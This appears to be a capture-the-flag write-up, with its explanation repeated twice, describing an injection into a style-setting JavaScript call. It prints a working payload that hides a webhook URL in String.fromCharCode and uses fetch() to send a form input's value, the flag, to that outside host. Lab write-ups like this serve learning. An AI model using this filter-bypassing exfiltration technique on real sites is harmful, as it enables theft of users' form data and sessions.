i
SRC: https://library.m0unt41n.ch/challenges/i
In this challenge we are very obviously able to inject code into a style tag of the page. Our goal is to obtain an admin session/username to make the server display the flag. The challenge includes a bot, which we can control (make him visit different style we inject with an admin session). So the goal is clear, perform a style based injection to exfil the flag via the bot executing the code within the style tags. Escaping is not possible due too < > being filtered.
The trick is within how the style is being set -> updateStyle(`YOUR_STYLE_CONTENT`) we can't escape the style tags, but we can escape this string within the function argument. For example: updateStyle(`${alert(1)}body{}`)
We are abusing this to execute JS like our fetch.
Then i made use of the String from char code trick, too bypass potential checks.
The bot is kind enough too fetch our webhook. One tricky part was getting the actual flag itself, just taking innerHtml/Text of the document body didnt work, cause the flag is within an input value. Getting the input by id was also difficult, cause ", ',` etc. was filtered, so ("flag") wasn't possible. Eventually figured out too use document.forms[0][1].value so basically navigated too the correct input via forms and indexation.
SRC: https://library.m0unt41n.ch/challenges/i
In this challenge we are very obviously able to inject code into a style tag of the page. Our goal is to obtain an admin session/username to make the server display the flag. The challenge includes a bot, which we can control (make him visit different style we inject with an admin session). So the goal is clear, perform a style based injection to exfil the flag via the bot executing the code within the style tags. Escaping is not possible due too < > being filtered.
The trick is within how the style is being set -> updateStyle(`YOUR_STYLE_CONTENT`) we can't escape the style tags, but we can escape this string within the function argument. For example: updateStyle(`${alert(1)}body{}`)
We are abusing this to execute JS like our fetch.
Then i made use of the String from char code trick, too bypass potential checks.
CSS:
${fetch(
String.fromCharCode(
104,116,116,112,115,58,47,47,
119,101,98,104,111,111,107,46,115,105,116,101,47,
50,101,51,57,54,53,49,100,45,98,50,97,99,45,
52,99,49,56,45,57,49,50,51,45,52,52,101,51,
101,50,57,102,55,53,101,52,47,63
).concat(encodeURIComponent(document.forms[0][1].value))
),
String.fromCharCode(32)
}body{}The bot is kind enough too fetch our webhook. One tricky part was getting the actual flag itself, just taking innerHtml/Text of the document body didnt work, cause the flag is within an input value. Getting the input by id was also difficult, cause ", ',` etc. was filtered, so ("flag") wasn't possible. Eventually figured out too use document.forms[0][1].value so basically navigated too the correct input via forms and indexation.
